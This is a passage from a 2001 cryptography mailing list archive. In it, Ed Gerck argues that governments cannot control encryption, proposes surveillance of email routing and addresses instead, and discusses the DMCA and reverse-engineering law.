allows for an effective audit trail per voter without disclosing the voter's
identity.  See  http://www.vote.caltech.edu/wote01/pdfs/gerck.pdf

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: dejavu, Re: Hijackers' e-mails were unencrypted

2001-10-05 Thread Ed Gerck



"Jay D. Dyson" wrote:

> On Wed, 3 Oct 2001, Ed Gerck wrote:
>
> > With all due respect to the need to vent our fears, may I remind this
> > list that we have all seen this before (that is, governments trying to
> > control crypto), from key-escrow to GAK, and we all know that it will
> > not work -- and for many reasons.  A main one IMO is that it is simply
> > impossible to prevent anyone from sending an encrypted message to anyone
> > else except by controlling the receivers and the transmitters (as done
> > in WWII, for example).
>
> Like you, I once believed that our government would follow
> sensible courses of action with respect to technology.  That time has
> passed.
>
> The advent of DMCA should have served as a wake-up call to the
> reality that our government no longer even operates under the *pretense*
> of sanity or rationality with respect to technology laws.

My point is not that a government would not, but that a government
could not control the use of crypto.  It would not work.

My suggestion was that controlling routing and addresses would
be much more efficient and would NOT require new laws and
ersosion of communication privacy.

>And anyone who dares to insist that I'm being alarmist can go
>reverse engineer the latest commercial "security solution," publish the
>results, and see just how "free" they remain.

Maybe it's time to put sanity back into the DMCA crying.

In the infamous case of Microsoft vs. Stacker many years ago, when MS
was found guilty of using Stacker's code in a MS product, Stacker was
nonetheless found guilty of proving it by reverse engineering -- in a
notion similar to trespassing.

So, as stressed in that judicial case that predates DMCA, if I would get a
court order to reverse engineer the latest commercial "security solution"
and be allowed to publish the results, I would remain free and within
the legal limits. Otherwise, I would not -- DMCA or not.

Comments?

Cheers,

Ed Gerck




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



dejavu, Re: Hijackers' e-mails were unencrypted

2001-10-03 Thread Ed Gerck


List:

With all due respect to the need to vent our fears, may I remind
this list that we have all seen this before (that is, governments
trying to control crypto), from key-escrow to GAK, and we all
know that it will not work -- and for many reasons.  A main one
IMO is that it is simply impossible to prevent anyone from
sending an encrypted message to anyone else except by
controlling the receivers and the transmitters (as done in WWII,
for example). Since controlling receivers and transmitters is
now really impossible, all one can do is control routing and
addresses. I suggest this would be a much more efficient way
to reduce the misuse of our communication networks. For
example, if one email address under surveillance receives
email from X, Y and Z, then X, Y and Z will also be added
to the surveillance. Even if everything is encrypted, people
and computers can be verified.

In addition, we also need to avoid to add fuel to that misconception,
that  encryption is somehow  "dangerous" or should be controlled
as weapons are. The only function of a weapon is to inflict harm.
The only function of encryption is to  provide privacy.

Cheers,

Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]